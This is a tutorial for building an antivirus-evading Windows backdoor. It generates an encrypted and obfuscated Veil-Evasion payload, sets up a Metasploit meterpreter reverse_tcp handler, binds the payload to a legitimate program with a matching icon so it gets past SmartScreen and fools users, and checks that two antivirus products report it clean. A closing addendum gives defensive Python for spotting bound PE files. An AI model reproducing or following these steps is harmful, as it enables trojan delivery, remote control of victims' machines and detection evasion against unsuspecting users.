Tutorial Requirements:
1- Veil Evasion: https://github.com/Veil-Framework/Veil-Evasion
2- Metasploit on Kali Linux
3- Windows Machine to emulate the victim
4- Smart Bind: a tool that binds the payload with the real program. I uploaded it to Filedropper, but you can also Google it: http://www.filedropper.com/smartbinderv20_1
Tutorial Guidelines:
Step 1: Generate Veil Evasion Payload
Note: this step requires installing Veil Evasion first.
- Start the tool by typing:
>>>> ./Veil-Evasion
- The tool is very simple to use; we'll start by listing all the available payloads by typing:
>>>> list
- After choosing our payload type, we set the local host and local port:
- Set Pyherion to Y for yes; this encrypts the payload.
- Set LHOST to your internal IP.
- Set LPORT to your local port, or leave it at the default.
- Type generate to create the payload.
- Type the name of the output file and hit enter.
Note: Try to choose a name that looks exactly like the real program's.
- Choose number 2 for Pwnstaller to obfuscate the code for more evasion and hit enter. Sometimes the encryption method alone is not enough; you need to add obfuscation to get the intended results.
- After you hit enter, the payload is created and saved in /usr/share/veil-output/compiled/nameOfFile
Step 2: Starting a Handler with Metasploit
Now that our payload is ready to go, we're going to set up our handler to make sure we get a connection back to our machine.
Note: a handler is basically what creates the connection between the attacker's machine and the victim, either locally (local network) or over the internet.
- First, start Metasploit by typing:
>>>> msfconsole
- Create the handler by typing:
>>>> use exploit/multi/handler
- Set the payload type:
>>>> set PAYLOAD windows/meterpreter/reverse_tcp
- Set the local host and local port (local network).
Note: The listening IP and port must match the ones in your payload. You cannot get a connection by using a different port number or IP.
- After setting everything up, type exploit to start listening:
>>>> exploit -j
Step 3: Bind the payload with an Executable File:
This step is very important for creating a legitimate-looking backdoor that not only evades anti-virus detectors but also looks like the real program.
We're going to use a program known as SmartBind. The program binds your payload with a legitimate executable file and changes its icon to match the real one.
When you generate a Veil-Evasion payload and try to use it on a Windows machine, the executable file looks suspicious and untrustworthy. See the image below:
Plus, when you click on it, Windows SmartScreen warns you that the application is unrecognized and not safe to run. As a result, the user may not run the app and we'll fail our mission.
Note: The reason the app is not recognized is that it lacks a digital signature from a trusted code-signing certificate.
Binding the payload with a legitimate application gets past this screen. Instead, you'll get a UAC (User Account Control) prompt, which is the regular notification when you're installing a new application.
Note: This program (SmartBind) may alert your antivirus. Therefore, use it on your virtual machine.
- Choose the icon that resembles the real program. In this case, we are using the Google icon.
- Click Add Files to add your payload.
- Click Add Files again to add your real executable program.
Once both are added, click Save Output File and save it where you want. Then click Bind Files. As you can see, the resulting app looks completely unsuspicious.
Step 4: Scanning Time
Now that the application is ready, it's time to scan it to make sure it's 100 percent clean. I used two anti-viruses for scanning: Kaspersky and Norton.
As you can see, both of these anti-viruses marked it as CLEAN!
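On the defender's side, a bound executable of the kind built in Step 3 tends to leave structural traces that a signature-based scan does not look for: data appended after the last PE section (the overlay where many binders store the bundled second program), an extra MZ/PE header inside the file, and no Authenticode security directory (the missing signature the note in Step 3 mentions). The Python below is an added example, not code from this tutorial, from Veil or from SmartBind; it parses those fields with the standard library only, and `build_minimal_pe` constructs a synthetic non-runnable sample so the check runs offline. That binders append the second file as an overlay is an assumption about their general layout, not something the tutorial states about SmartBind.

```python
import struct

OPT_SIZE = 224  # PE32 optional header size, including the 16 data directories

def build_minimal_pe(section_data: bytes, overlay: bytes = b"") -> bytes:
    """Constructed sample input: a minimal, non-runnable PE32 image with one section.
    Anything passed as overlay is appended after the last section, as a binder would."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)              # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, OPT_SIZE, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (OPT_SIZE - 2)          # magic + zeroed fields
    raw_ptr = 0x200                                                  # first file-aligned slot
    sec = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", len(section_data), 0x1000, len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    img = (dos + b"PE\0\0" + coff + opt + sec).ljust(raw_ptr, b"\0")
    return img + section_data + overlay

def analyze_pe(data: bytes) -> dict:
    """Return binder-style indicators: bytes past the last section (overlay),
    extra embedded PE headers, and whether an Authenticode directory is present."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    n_sections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    # Data directories start at +96 for PE32 and +112 for PE32+; index 4 is the security directory
    dir_base = opt + (96 if magic == 0x10B else 112)
    _, sec_dir_size = struct.unpack_from("<II", data, dir_base + 4 * 8)
    end_of_sections = 0
    for i in range(n_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, opt + opt_size + i * 40 + 16)
        end_of_sections = max(end_of_sections, raw_ptr + raw_size)
    # Count further "MZ" headers whose e_lfanew points at a valid "PE\0\0" signature
    embedded, pos = 0, data.find(b"MZ", 1)
    while pos != -1:
        if pos + 0x40 <= len(data):
            lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            if data[pos + lfanew:pos + lfanew + 4] == b"PE\0\0":
                embedded += 1
        pos = data.find(b"MZ", pos + 1)
    return {"overlay_bytes": max(len(data) - end_of_sections, 0),
            "embedded_pe_count": embedded, "signed": sec_dir_size > 0}

if __name__ == "__main__":
    bound = build_minimal_pe(b"\x90" * 16, overlay=build_minimal_pe(b"\xcc" * 16))
    print(analyze_pe(bound))
```

A large overlay plus a second PE header in an unsigned file is a strong triage hint even when both anti-virus engines report it clean.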